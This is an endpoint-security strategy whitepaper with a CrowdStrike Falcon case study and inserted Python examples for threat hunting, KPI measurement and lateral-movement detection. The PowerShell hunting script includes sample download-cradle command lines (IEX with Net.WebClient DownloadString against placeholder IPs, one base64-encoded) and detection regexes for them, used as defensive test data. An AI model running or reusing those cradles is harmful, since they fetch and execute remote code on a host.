<strong>SOLUTION</strong> <strong>SPOTLIGHT</strong><br />
Next Generation Endpoint Strategy<br />
Rafal Los, Director, Solutions Research<br />
Introduction<br />
Enterprises continue to suffer from the growing cost of breaches,<br />
many of which originate at the endpoint, despite deploying ever<br />
more security tools to these corporate assets. According to the 2015<br />
Ponemon Cost of Data Breach Study, the average cost of a data breach<br />
is now $3.79 million USD, a 23 percent increase since 2013. Adversaries<br />
evolve and adapt while security tools remain static, leaving defenders<br />
at a significant disadvantage. The signature-focused, alert-centric,<br />
reactive model for endpoint security tools must evolve beyond currently<br />
deployed capabilities to meet the productivity needs of the enterprise<br />
in an increasingly hostile environment.<br />
$3.79 million USD<br />
Average cost of a data breach<br />
2015 Ponemon Cost of Data Breach Study
Identifying the<br />
Challenges<br />
Business Perspective<br />
The topic of corporate endpoint security<br />
is commonplace in the board rooms of<br />
enterprises large and small as the seemingly<br />
never-ending arms race with adversaries<br />
– whether activist, hacktivist, corporate or<br />
nation-state sponsored – yields breach after<br />
breach. Business leaders look to security<br />
executives to define security strategies that<br />
are operationally mature while continuing to<br />
allow the business to be agile and cost-effective,<br />
and to empower their workforce for maximum<br />
utility in increasingly hostile environments. As<br />
more security executives and professionals push<br />
their endpoint strategies into tighter alignment<br />
with business objectives, the delicate balance<br />
between productivity, cost and security benefit<br />
remains a challenge.<br />
Even more frustrating for business executives<br />
is that as security spending increases, it never<br />
seems to be enough. Executives are continually<br />
frustrated that, no matter how much money<br />
and how many people they invest in security,<br />
they can always be doing more. Adversaries<br />
are always a step ahead and a second faster –<br />
meaning breaches continue to make headlines<br />
in spite of the rise in security budgets.<br />
Endpoint security programs, which are key<br />
components of a holistic enterprise security<br />
strategy, are struggling to adapt to the rapid<br />
escalation in adversary activity and to protect<br />
the corporate endpoint in a more meaningful<br />
and effective way.<br />
Adversaries are winning<br />
Furthermore, from anecdotal evidence,<br />
business leaders are increasingly pushing back<br />
against the additive security model, hesitating<br />
to add more obstacles to end user productivity<br />
by loading endpoints with yet another<br />
agent. As specialized tools are deployed by<br />
security for prevention, detection, response and<br />
recovery tasks, endpoints inevitably slow down<br />
and system overhead increases. Even<br />
with the addition of new tools, endpoint<br />
systems continue to be compromised because<br />
there is a general lack of holistic integration<br />
between network, endpoint and other<br />
security tools. Deployed technologies<br />
are inadequate and fail to address continually<br />
changing threats as adversaries evolve tactics<br />
and adapt quickly to static, pattern-based<br />
defenses. An evolution in endpoint security<br />
that couples actionable threat intelligence with<br />
pro-active attack detection is required.<br />
An Evolution on the Endpoints<br />
In the course of engaging with clients on<br />
security strategy engagements, the Office of<br />
the CISO has discovered that a vast majority<br />
of Fortune 1000 clients do not have adequate<br />
endpoint protection against even moderately<br />
advanced adversaries. Nearly all strategy<br />
roadmaps of these clients include a refresh of<br />
endpoint security tools with a heavy focus on<br />
advanced threats and mitigations.<br />
Overall, enterprises are looking to an evolution<br />
on the endpoints to provide better tools to<br />
decrease the impact of an infiltration or breach,<br />
decrease the dwell time of their attackers and<br />
improve response and remediation capabilities.<br />
Security Perspective<br />
The rise in high profile breaches comes as no<br />
surprise to enterprise security professionals.<br />
As adversaries evolve and adapt, defenses have<br />
largely remained static even though more tools<br />
are added on a regular basis, especially to the<br />
endpoint. Security still depends on signatures<br />
and patterns, and continues to focus on<br />
malware, which is responsible for a mere 40<br />
percent of all breaches according to the 2013<br />
Verizon Data Breach Investigations Report<br />
(DBIR).<br />
The evolving adversary continues to be a<br />
problem for signature-based detection tools.<br />
Over the last decade these tools have attempted<br />
to keep pace with adversaries by writing more<br />
signatures faster, and broadening detection<br />
capabilities. This approach has created multiple<br />
problems. First, an adversary can adapt and<br />
evolve their attack patterns faster than tools<br />
providers can update signatures. Second,<br />
alerts from even a well-tuned detection<br />
platform can quickly overwhelm a security<br />
team’s ability to respond effectively. Finally,<br />
many security tools still focus on network-based<br />
defenses while corporate assets become<br />
ever more mobile.<br />
Detection Methods<br />
Static indicators as a detection method<br />
for malicious activity continue to deliver<br />
diminishing results as sophisticated adversaries<br />
move beyond malware. To repeat, according<br />
to the 2013 Verizon DBIR, only 40 percent<br />
of successful breaches involved malware.<br />
Adversaries are moving from dropping packaged<br />
malware as the primary method of attack to<br />
directly attacking browsers and operating<br />
systems using tools already built into the<br />
operating system. Examples include PowerShell<br />
and in-memory attacks that execute without<br />
ever writing a payload to disk, so file-based<br />
detection tools fail silently.<br />
Network detection tools offer scale, but lack the<br />
ability to protect corporate assets as they<br />
become increasingly mobile. Relying solely<br />
on network-based defenses quickly proves<br />
problematic because much modern malware<br />
simply waits for the endpoint to leave the safety<br />
of the corporate perimeter before performing<br />
its tasks.<br />
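The fileless PowerShell case above is exactly what endpoint telemetry has to catch once file scanning is blind. As an added illustration (not the report's or any vendor's code), the following Python hunt scores process-creation events on the command-line indicators a disk-only scanner never sees, and decodes an -EncodedCommand payload so the download cradle hidden inside it can be inspected. The sample events, field names, weights and alert threshold are constructed assumptions, not a product schema.<br />

```python
"""Hunt for fileless PowerShell activity in process-creation telemetry.

Added illustration, not the report's or any vendor's code. It runs over a
small constructed set of process-creation events; the event fields used
here (host, parent, image, cmdline) are assumptions, not a product schema.
"""
import base64
import re
from typing import Dict, List, Optional


def encode_ps(command: str) -> str:
    """Produce the base64 (UTF-16LE) form that powershell -EncodedCommand expects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample events. ws-102 mimics a macro-launched, encoded download
# cradle; ws-103 an in-the-clear cradle; the other two are routine admin use.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws-101", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"},
    {"host": "ws-102", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"host": "srv-07", "parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\backup.ps1"},
    {"host": "ws-103", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.9/s')\""},
]

# Indicators of in-memory execution, each with an illustrative weight.
# Tune weights and threshold against a baseline of your own admin activity.
INDICATORS = {
    "encoded_command": (2, re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    "download_cradle": (3, re.compile(r"(?i)DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient")),
    "invoke_expression": (2, re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b")),
    "hidden_window": (1, re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    "no_profile": (1, re.compile(r"(?i)-no?p(?:rofile)?\b")),
    "policy_bypass": (1, re.compile(r"(?i)-ex(?:ecutionpolicy)?\s+bypass")),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
OFFICE_PARENT_WEIGHT = 3   # an Office document spawning a shell is rarely benign
ALERT_THRESHOLD = 4


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script passed via -EncodedCommand (base64 of UTF-16LE)."""
    m = re.search(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: Dict[str, str]) -> Dict[str, object]:
    """Score one event; the decoded payload is searched alongside the raw command line."""
    decoded = decode_encoded_command(event["cmdline"])
    haystack = event["cmdline"] + ("\n" + decoded if decoded else "")
    hits = [name for name, (_, pat) in INDICATORS.items() if pat.search(haystack)]
    score = sum(INDICATORS[name][0] for name in hits)
    if event["parent"].lower() in OFFICE_PARENTS:
        hits.append("office_parent")
        score += OFFICE_PARENT_WEIGHT
    return {"host": event["host"], "score": score, "hits": hits, "decoded": decoded}


def hunt(events: List[Dict[str, str]], threshold: int = ALERT_THRESHOLD) -> List[Dict[str, object]]:
    """Return PowerShell events at or above the threshold, highest score first."""
    shells = {"powershell.exe", "pwsh.exe"}
    scored = [score_event(e) for e in events if e["image"].lower() in shells]
    flagged = [s for s in scored if s["score"] >= threshold]
    return sorted(flagged, key=lambda s: s["score"], reverse=True)


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["host"], finding["score"], ",".join(finding["hits"]))
        if finding["decoded"]:
            print("  decoded:", finding["decoded"])
```

The point of decoding rather than just flagging -enc is that the encoded blob is where the cradle lives; a rule that stops at "encoded command present" will page on every product that uses encoding legitimately, while one that reads the payload can tell a backup script from IEX pulling a stage from the Internet.<br />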
The inability to quickly and effectively<br />
share critical security information puts<br />
the enterprise security team at a severe<br />
disadvantage. Such a narrow view<br />
makes defending against previously unknown<br />
threats extremely inefficient. To compound<br />
the situation, hiring and retaining top-level<br />
threat analysts continues to pose a challenge<br />
for even some of the largest enterprises. The<br />
result is a narrow perspective, inefficient use<br />
of available tools, and a continued struggle<br />
to defend against adversaries that adapt and<br />
overcome enterprise defenses.<br />
Only 40%<br />
of breaches<br />
involved malware<br />
- 2013 Verizon Data Breach<br />
Investigations Report<br />
Solution Analysis<br />
Strategy<br />
As part of a holistic, defense-in-depth strategy,<br />
the endpoint is a logical defensive control point<br />
for organizations that have maturing network<br />
controls and still struggle with intrusions.<br />
Minimizing dependence on reactive, alert-based<br />
detection where the security organization<br />
is notified post-facto of a security event is a<br />
necessary evolutionary step. But this evolution<br />
to a more mature model of pro-active detection<br />
of malicious activity, known as hunting for<br />
indicative behaviors, is out of reach for many<br />
because of the shift in talent, processes, data<br />
and tools it requires. As security teams further<br />
mature and build out their defense-in-depth<br />
capabilities, they are creating three-fold<br />
endpoint strategies.<br />
First, there is a strong desire to incorporate<br />
threat intelligence purposefully into the<br />
endpoint security mechanism to continually<br />
understand and detect the latest known<br />
threats. Second is the evolution of signatures<br />
beyond post-facto indicators of compromise<br />
(IOCs) to a pro-active indicator model that<br />
seeks to detect and stop unknown attacks earlier<br />
in the attack lifecycle. Finally there is a gradual<br />
move to push strategic functions, such as the<br />
ability to hunt, out to a center of excellence<br />
(CoE) approach. In many cases this translates<br />
to outsourcing this capability to a third party or<br />
centralized Security Operations Center (SOC).<br />
Operationally this decreases the volume<br />
of alerts a security organization ultimately<br />
faces and shifts the focus from detecting and<br />
remediating known threats to hunting and<br />
finding previously unknown threats. In this<br />
manner security teams can be more effective,<br />
focusing their workload on the truly significant<br />
security threats to the organization.<br />
Prerequisites<br />
In order to make this evolutionary journey,<br />
enterprise security teams must meet three<br />
basic criteria. The IT organization must have<br />
the ability to manage endpoints effectively<br />
while the security organization must possess<br />
the operational capability to triage events<br />
and perform appropriate incident response<br />
actions.<br />
[Figure: the three prerequisites – manage endpoints, triage events, incident response]<br />
As a prerequisite, the IT organization must<br />
have a well-operationalized endpoint<br />
management capability to identify, deploy<br />
and manage software components of the<br />
endpoint. The security organization, while not<br />
directly responsible for these tasks, relies upon<br />
the ability to utilize this capability through an<br />
automated, on-demand platform to provide<br />
context to security events for prioritization.<br />
This collaboration highlights the necessary<br />
interdependency between enterprise security<br />
and enterprise IT, and emphasizes solid<br />
fundamentals as a baseline requirement for<br />
any advanced capabilities.<br />
Additionally, enterprise security must have<br />
or must be developing the operational<br />
capabilities – including processes and human<br />
resources as necessary – to triage the events.<br />
Endpoint security monitoring will then<br />
identify and perform requisite actions. Without<br />
the ability to triage and properly respond, even<br />
advanced endpoint tools are relegated to best-guess<br />
based on a combination of signatures<br />
and statistical models which don’t take into<br />
account an enterprise’s unique operational and<br />
resource constraints.<br />
Operational Guidance<br />
Strategic<br />
Endpoint security must be considerate of<br />
corporate endpoint operating parameters,<br />
meaning strategy must take into account<br />
the way that endpoints are used to enable<br />
and support the business.<br />
• Minimal impact during deployment,<br />
operation and maintenance – Endpoint<br />
security must limit the impact on the<br />
productivity of the endpoint. Reboots,<br />
resource utilization and compatibility<br />
concerns must be tested and vetted before<br />
standardizing on a tool. Most endpoints are<br />
already overloaded with security agents (from<br />
disk encryption to anti-virus and e-discovery<br />
for starters) so adding an additional agent will<br />
generally receive push-back from operations<br />
teams. Supplantive technologies are generally<br />
preferred with minimal impact to the<br />
endpoint’s resources and productivity high on<br />
the requirements list.<br />
• Remote supportability – Endpoint security<br />
tools must be as operational “outside the<br />
network” as they are inside. Tools which<br />
only function fully when inside a defined<br />
corporate perimeter risk leaving the endpoint<br />
exposed, as many endpoint devices are mobile<br />
and operate in increasingly diverse and<br />
hostile environments.<br />
• Comprehensive coverage – The<br />
expectation that all corporate endpoints<br />
will be homogenous is unrealistic in today’s<br />
enterprise as Windows, Mac OS, Android,<br />
iOS and others jockey for share of corporate<br />
endpoints. Endpoint tools should provide<br />
coverage of an enterprise’s full environment<br />
from a single, centralized tool.<br />
Tactical<br />
An endpoint security solution requires<br />
operational and tactical support to be<br />
effective, including the following:<br />
• Contextual analysis – Endpoint tools<br />
which rely only on hashes and patterns<br />
fall victim to the malware arms race that is<br />
created as adversaries easily mutate their<br />
payloads to bypass detection. Endpoint<br />
security tools today must use a combination<br />
of pattern detection and anomaly analysis<br />
while incorporating threat intelligence<br />
where practical. Furthermore, tools that<br />
have the capabilities to leverage multiple<br />
endpoint environments through anonymized<br />
information sharing or cloud services have an<br />
advantage over local only approaches.<br />
• Security Operations Center –To effectively<br />
manage security of the enterprise holistically,<br />
a security operations center must be set<br />
up to provide a clearing house for inbound<br />
intelligence, tooling, analysis and response<br />
for escalated security events. Endpoint<br />
security must have effective integration<br />
into this core security operations function,<br />
being able to both consume external and<br />
internal intelligence and collaborate on event<br />
prevention, detection, response and recovery.<br />
Additionally, the advanced capability to move<br />
beyond signatures and to “hunt” becomes a<br />
crucial function of the SOC.<br />
• Response and remediation support –<br />
Enterprise endpoints should be expected<br />
to experience attack on a regular basis. The<br />
endpoint security suite must lend itself to<br />
integration with response and remediation<br />
support to continuously and quickly identify<br />
and shut down incidents before they<br />
become catastrophic – a concept known<br />
as continuous response. It is beneficial if<br />
endpoint security tools can perform remote<br />
data collection and remediation procedures<br />
to minimize the amount of high-touch<br />
interactions a security incident response<br />
organization has with the endpoints. This<br />
minimizes negative impact to productivity<br />
and potentially the impact to cost of incident<br />
response as well.<br />
Capabilities *<br />
• Decreased impact of infiltration – With<br />
the addition of external threat intelligence<br />
and decreased reliance on signature-based<br />
detection, it becomes possible to detect<br />
threats earlier in the attack lifecycle. The goal<br />
is to identify and stop attacks in progress<br />
where possible and thereby reduce the<br />
impact a successful infiltration may have on<br />
the organization.<br />
• Decreased dwell time of adversaries – As the<br />
security organization develops the capability<br />
to detect malicious activity faster, it decreases<br />
the amount of time that an adversary will<br />
have to move around within the victim’s<br />
networks after a successful infiltration. This<br />
diminishes effectiveness of the adversary in<br />
achieving their objectives.<br />
• Improved response and remediation<br />
capabilities – A key result of improved<br />
visibility and comprehensive profiling of an<br />
adversary is being able to tell the difference<br />
between an opportunistic malware infection<br />
(generic) and a determined adversary<br />
(persistent). Knowing the threat type leads<br />
to better prioritization, more purposeful<br />
response, and more complete remediation.<br />
Furthermore, endpoint tools should play a<br />
pivotal role in incident response procedures,<br />
often being at the focus point of the incident.<br />
Mature endpoint tools should provide<br />
operational visibility through data and<br />
telemetry and response capabilities through<br />
containment, remediation and remote response.<br />
*For clarity, it is necessary to note here that<br />
what is being discussed is an evolutionary<br />
step beyond what is commonly referred to as<br />
traditional anti-virus endpoint tools.<br />
Measure and Improve<br />
As with any undertaking, it is extremely<br />
important to set goals and measure relative<br />
distance to these goals. Endpoint security may<br />
directly impact end user productivity and thus<br />
must be carefully controlled and measured<br />
for that business impact. Measuring the impact<br />
of a program item, such as endpoint security,<br />
against pre-defined, business-aligned goals and<br />
objectives provides concrete evidence of the<br />
program’s value.<br />
When thinking about endpoint security, one<br />
must consider Key Performance Indicators<br />
(KPIs) such as workload optimization,<br />
productivity gains, incident reduction and<br />
proactive detection.<br />
It is important to establish a set of goals before<br />
embarking on an endpoint security program<br />
or project. What are the key things that the<br />
program should accomplish? What is the state<br />
of those things now and can it be measured?<br />
How much of a difference is an investment<br />
in endpoint security tools expected to make?<br />
These are all questions that should have<br />
formulas for answering them as the program<br />
progresses.<br />
Possible Key Performance Indicators (KPIs)<br />
include:<br />
• Time-to-detection – A quantitative way to<br />
demonstrate the value of a next-generation<br />
endpoint strategy is to compare it against<br />
existing tools in similar situations for the<br />
detection of threats. Traditional pattern-based<br />
solutions will have a significantly longer<br />
time to detection, especially on previously<br />
unknown threats, versus next-generation<br />
solutions that rely on a much richer set of<br />
indicators.<br />
• Time-to-remediation – One of the key value<br />
drivers of a next-generation endpoint solution<br />
is the additional capabilities that serve to<br />
decrease the time it takes to remediate a<br />
potential issue. The ability to compare existing<br />
remediation times using current endpoint<br />
tools against a next-generation solution<br />
can quickly help demonstrate value by<br />
showing the positive impact of the solution<br />
on lost productivity and cumulative times to<br />
remediation.<br />
• Malware-to-incident ratio – Measuring for<br />
the decreased impact of an infiltration, this KPI<br />
measures the number of malware “catches”<br />
against the number of incident response<br />
actions generated for those catches. We look<br />
for a drop in the number of incidents even as<br />
malware rates continue to rise, reaffirming<br />
that a successful malware infiltration onto an<br />
endpoint or system does not guarantee victory<br />
for the adversary or a requirement for an<br />
incident responder.<br />
• Attacker dwell time – This KPI measures the<br />
time from when a piece of malware or attacker<br />
is identified as first infiltrating a system to<br />
when that attacker or piece of malware is<br />
successfully removed from the endpoint.<br />
What we are looking for is a systemic decrease<br />
in how long an attacker has free rein on our<br />
endpoints before they are caught and ejected.<br />
• Incident close rate – One of the most<br />
important KPIs that endpoint tools support<br />
is the rapid remediation and closure rate of<br />
incidents. With better tools, responders can<br />
more quickly get inside the attacker’s kill<br />
chain and stop the attack. One good way of<br />
identifying improvement is the number of<br />
incidents a responder can close in a shift.<br />
[Figure: Measuring and Improving – time-to-detection, time-to-remediation, malware-to-incident ratio, attacker dwell time, incident close rate]<br />
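The KPIs above only become evidence once they are computed the same way before and after a tooling change. The following Python is an added worked example, not the report's own method or any product's reporting: it derives all five KPIs from a set of incident records and expresses the change between a baseline period and a next-generation period as a percentage. The records are constructed, and the field names (first_activity, detected, remediated, malware_catch, incident) and the shift counts are assumptions.<br />

```python
"""Compute the endpoint-program KPIs listed above from incident records.

Added worked example, not the report's own method or any product's output.
The records are constructed for illustration and the field names are
assumptions: first_activity (earliest attacker activity identified on the
endpoint), detected, remediated, malware_catch (a malware sample was
involved) and incident (an incident-response action was opened).
"""
from datetime import datetime
from statistics import median
from typing import Dict, List


def ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M")


def record(rid: str, first_activity: str, detected: str, remediated: str,
           malware_catch: bool, incident: bool) -> dict:
    return {"id": rid, "first_activity": ts(first_activity), "detected": ts(detected),
            "remediated": ts(remediated), "malware_catch": malware_catch, "incident": incident}


# Constructed: a period on pattern-based tools (two slow catches, one AV block) ...
BASELINE = [
    record("A1", "2015-06-01 08:00", "2015-06-10 09:00", "2015-06-12 17:00", True, True),
    record("A2", "2015-06-03 10:00", "2015-06-20 11:00", "2015-06-25 15:00", True, True),
    record("A3", "2015-06-05 12:00", "2015-06-05 12:00", "2015-06-05 12:05", True, False),
]
# ... and a period on next-generation tooling. B4 is a malware-free intrusion
# found by hunting, which the legacy tools had no way to record at all.
NEXTGEN = [
    record("B1", "2015-07-01 09:00", "2015-07-01 11:00", "2015-07-01 15:00", True, True),
    record("B2", "2015-07-02 09:00", "2015-07-02 09:30", "2015-07-02 10:00", True, False),
    record("B3", "2015-07-03 08:00", "2015-07-03 09:00", "2015-07-03 12:00", True, False),
    record("B4", "2015-07-04 08:00", "2015-07-05 08:00", "2015-07-05 14:00", False, True),
]


def hours(start: datetime, end: datetime) -> float:
    return (end - start).total_seconds() / 3600.0


def compute_kpis(records: List[dict], shifts_worked: int) -> Dict[str, float]:
    """Medians are used so one stale incident cannot dominate the period."""
    catches = [r for r in records if r["malware_catch"]]
    incidents = [r for r in records if r["incident"]]
    incidents_from_catches = [r for r in catches if r["incident"]]
    return {
        "median_time_to_detection_h": median([hours(r["first_activity"], r["detected"]) for r in records]),
        "median_time_to_remediation_h": median([hours(r["detected"], r["remediated"]) for r in records]),
        "median_dwell_time_h": median([hours(r["first_activity"], r["remediated"]) for r in records]),
        "malware_catches": float(len(catches)),
        # incidents that a malware catch turned into, per catch: lower means
        # a catch on the endpoint less often required a responder
        "malware_to_incident_ratio": len(incidents_from_catches) / len(catches) if catches else 0.0,
        "malware_free_incidents": float(sum(1 for r in incidents if not r["malware_catch"])),
        "incidents_closed_per_shift": len(incidents) / shifts_worked,
    }


LOWER_IS_BETTER = {"median_time_to_detection_h", "median_time_to_remediation_h",
                   "median_dwell_time_h", "malware_to_incident_ratio"}
HIGHER_IS_BETTER = {"incidents_closed_per_shift"}


def improvement(before: Dict[str, float], after: Dict[str, float]) -> Dict[str, float]:
    """Percent improvement per KPI, positive meaning better, honouring direction.
    Raw counts (catches, malware-free incidents) are context, not a score."""
    out = {}
    for key in LOWER_IS_BETTER | HIGHER_IS_BETTER:
        b, a = before[key], after[key]
        if b == 0:
            continue
        pct = (b - a) / b * 100.0 if key in LOWER_IS_BETTER else (a - b) / b * 100.0
        out[key] = round(pct, 1)
    return out


if __name__ == "__main__":
    base = compute_kpis(BASELINE, shifts_worked=10)   # assumed analyst shifts in period
    nxt = compute_kpis(NEXTGEN, shifts_worked=4)
    for key, pct in sorted(improvement(base, nxt).items()):
        print(f"{key:32s} {base[key]:8.2f} -> {nxt[key]:8.2f}  ({pct:+.1f}%)")
```

Two caveats a practitioner should carry into the dashboard: dwell time is measured from the earliest activity the tool could identify, so a tool with better visibility will initially report longer dwell times than a blind one, and the malware-free incident count is the metric that shows the hunt capability working, which is why it is reported separately rather than folded into the ratio.<br />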
Case Study in<br />
Next Gen Endpoint<br />
Organizational Profile<br />
The organization featured in this case study<br />
is a global financial services provider with<br />
a diversity in assets, products and global<br />
presence. In order to adapt to a growing threat<br />
climate, the organization sought to provide<br />
additional layers of security beyond traditional<br />
security tools such as endpoint anti-virus.<br />
The move to a next-generation endpoint<br />
was seen as strategic and necessary to detect<br />
sophisticated adversaries inside the perimeter<br />
to globally reduce risk to the enterprise.<br />
The globally diverse corporate endpoint<br />
infrastructure necessitated a solution that can<br />
enable the security team to identify previously<br />
unknown threats faster – before the adversary<br />
can achieve their objectives.<br />
Challenges<br />
Business Perspective<br />
Businesses have developed mathematical<br />
and risk-based models for dealing with<br />
attackers. Even though malware continues<br />
to be a problem for the enterprise, it is the<br />
adversary that is proving truly worrisome.<br />
Determined attackers take the time<br />
to understand the enterprise – often better<br />
than it understands itself – and custom-craft<br />
attacks that bypass existing signature-based<br />
defenses, so the system fails silently. In<br />
these scenarios, attacks are missed and the<br />
enterprise often finds out about a high-profile<br />
breach and exfiltration of critical assets from a<br />
third party or, worse, the media.<br />
At the same time, business leadership is<br />
pushing hard to keep the enterprise safe<br />
from both known and unknown threats.<br />
Threats that are currently unknown, such as<br />
nation-state adversaries, organized crime or<br />
industrial espionage, are well-funded and<br />
persistent and adapt their attacks to the target.<br />
Business leadership needs accountability, cost-containment<br />
and certainty in the tools the<br />
security organization is utilizing.<br />
Technology Perspective<br />
As adversaries evolve, traditional endpoint<br />
security approaches are simply not keeping<br />
pace. Making the assumption that determined<br />
adversaries will eventually gain access into the<br />
network, it becomes important to understand<br />
their methods, movements and actions to<br />
effectively determine a course of action.<br />
Existing tools were inadequate for this task, so<br />
an alternative was sought.<br />
At the core of the problem was the inability to<br />
detect lateral movement from compromised<br />
endpoints. As a result, adversary dwell time<br />
was unknown – but assumed high – and<br />
the enterprise security team’s visibility was<br />
extremely limited. When a compromised<br />
endpoint was discovered, there were no<br />
immediately available tools to aid in<br />
determining what actions that compromised<br />
endpoint may have taken, where an attack<br />
originated (if not at that endpoint), and the<br />
scope of the resultant breach. Furthermore,<br />
adversaries that did not utilize malware for the<br />
attack were not being detected at all.<br />
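Detecting lateral movement from a compromised endpoint, and scoping which hosts it touched, is largely a fan-out question over connection or logon telemetry. The following Python is an added example, not the case-study organization's or CrowdStrike's logic: it flags any source that reaches an unusual number of distinct peers on remote-execution and file-sharing ports within a short window, and keeps an allowlist for hosts that fan out legitimately (patch and scan servers) so they do not drown the hunt. The connection records, ports, window and threshold are constructed assumptions.<br />

```python
"""Flag endpoints that fan out to many peers on admin services in a short window.

Added worked example, not the report's or any vendor's code. The connection
records are constructed; the fields (time, src, dst, dport) are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Set

# Services used for remote execution and file access on Windows and Linux
# estates: SMB, RPC, RDP, WinRM, SSH. Constructed set; extend for your estate.
LATERAL_PORTS = {445, 135, 3389, 5985, 5986, 22}
# Hosts expected to touch many peers (patching, vulnerability scanning).
# Constructed allowlist; in practice derive it from a measured baseline.
KNOWN_FANOUT_SOURCES = {"srv-mgmt"}
WINDOW = timedelta(minutes=60)
MIN_DISTINCT_TARGETS = 5


def t(hhmm: str) -> datetime:
    return datetime.strptime("2015-07-01 " + hhmm, "%Y-%m-%d %H:%M")


# Constructed: ws-102 sweeps six hosts in forty minutes; ws-101 and ws-103 do
# ordinary work; srv-mgmt is a patch server that legitimately reaches everything.
_RAW = [
    ("09:00", "ws-101", "srv-fs1", 445), ("09:30", "ws-101", "srv-fs1", 445),
    ("09:45", "ws-101", "srv-mail", 443),
    ("10:00", "ws-102", "ws-105", 445), ("10:05", "ws-102", "ws-106", 445),
    ("10:12", "ws-102", "srv-fs1", 445), ("10:20", "ws-102", "srv-db1", 3389),
    ("10:31", "ws-102", "ws-110", 445), ("10:40", "ws-102", "srv-ad1", 445),
    ("08:00", "ws-103", "srv-fs1", 445), ("11:00", "ws-103", "srv-print", 445),
    ("14:00", "ws-103", "srv-db1", 3389),
    ("12:00", "srv-mgmt", "ws-101", 445), ("12:01", "srv-mgmt", "ws-102", 445),
    ("12:02", "srv-mgmt", "ws-103", 445), ("12:03", "srv-mgmt", "ws-104", 445),
    ("12:04", "srv-mgmt", "ws-105", 445),
]
SAMPLE_CONNECTIONS = [{"time": t(a), "src": b, "dst": c, "dport": d} for a, b, c, d in _RAW]


def find_lateral_movement(events: List[dict], window: timedelta = WINDOW,
                          min_targets: int = MIN_DISTINCT_TARGETS,
                          allow: Set[str] = KNOWN_FANOUT_SOURCES) -> List[dict]:
    """One finding per source: the window in which it reached the most distinct peers."""
    by_src: Dict[str, List[dict]] = defaultdict(list)
    for e in events:
        if e["dport"] in LATERAL_PORTS and e["src"] not in allow and e["src"] != e["dst"]:
            by_src[e["src"]].append(e)
    findings = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["time"])
        best: Optional[dict] = None
        for i, first in enumerate(evs):
            # every connection starting within `window` of this one
            targets = {e["dst"] for e in evs[i:] if e["time"] - first["time"] <= window}
            if len(targets) >= min_targets and (best is None or len(targets) > len(best["targets"])):
                best = {"src": src, "window_start": first["time"], "targets": sorted(targets)}
        if best:
            findings.append(best)
    return findings


def scope(events: List[dict], src: str) -> List[str]:
    """Every host the compromised source touched on an admin port, for breach scoping."""
    return sorted({e["dst"] for e in events if e["src"] == src and e["dport"] in LATERAL_PORTS})


if __name__ == "__main__":
    for f in find_lateral_movement(SAMPLE_CONNECTIONS):
        print(f["src"], f["window_start"].strftime("%H:%M"), ", ".join(f["targets"]))
        print("  full scope:", ", ".join(scope(SAMPLE_CONNECTIONS, f["src"])))
```

Without the allowlist the patch server is the loudest source in the estate, which is the usual reason this kind of hunt gets switched off; a per-host baseline of normal fan-out is the better long-term fix than a static list.<br />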
Solution Approach<br />
Solution Chosen<br />
To alleviate the enterprise security team’s<br />
challenges, CrowdStrike Falcon Host was<br />
chosen. Selected for its ability to detect<br />
unknown unknowns as well as pattern-defined<br />
threats, Falcon was utilized on both servers<br />
and workstation endpoint systems. Falcon<br />
was selected for its unified visibility on both<br />
workstation and server endpoints, and because<br />
it directly incorporated CrowdStrike’s extensive<br />
threat intelligence knowledgebase into the<br />
product.<br />
Desired Capabilities<br />
There were five key factors in the selection of<br />
CrowdStrike Falcon Host.<br />
1. Unified server and workstation visibility<br />
from a single agent and management<br />
console<br />
2. Forensic insight (hunting capabilities)<br />
3. Ease of deployment throughout the<br />
environment<br />
4. Superior user interface of the management<br />
console<br />
5. Lightweight nature of the endpoint agent<br />
The capability to deploy a single, unified<br />
agent across servers and workstations<br />
decreases the amount of work an operations<br />
team would need to do to package the tool<br />
for deployment – thus making this feature<br />
incredibly underrated and critical to successful<br />
deployment. Because the agent is lightweight,<br />
deployment was refreshingly low-stress across<br />
a diverse environment, primarily Linux and<br />
Windows endpoints, without consuming enough<br />
memory, CPU or disk to cause end user<br />
productivity issues. In<br />
large environments where endpoints are in<br />
what feels like a continuous update cycle,<br />
the lightweight nature of the Falcon agent<br />
definitely aided its deployment success.<br />
Security tools, not unlike most other IT tools,<br />
can succeed or fail based on the management<br />
console or dashboard. Management consoles<br />
that are designed with product use cases<br />
in mind streamline workflow and optimize<br />
use of precious human resources. When<br />
investigating a potentially critical security<br />
issue within the environment, a clean, simple,<br />
well-designed user interface can mean the<br />
difference between stopping an adversary and<br />
spending an afternoon trying to find the right<br />
information to make the decision.<br />
Additionally, the advanced ability to “hunt” –<br />
or query system parameters and data in near<br />
real-time – becomes pivotal when looking<br />
beyond pattern detection. As adversaries<br />
evolve it will continue to be more and more<br />
critical that enterprise security organizations<br />
move beyond pattern-based threat recognition<br />
and malware signatures. Malware-free<br />
intrusions which use custom-crafted attack<br />
vectors are likely to continue to increase,<br />
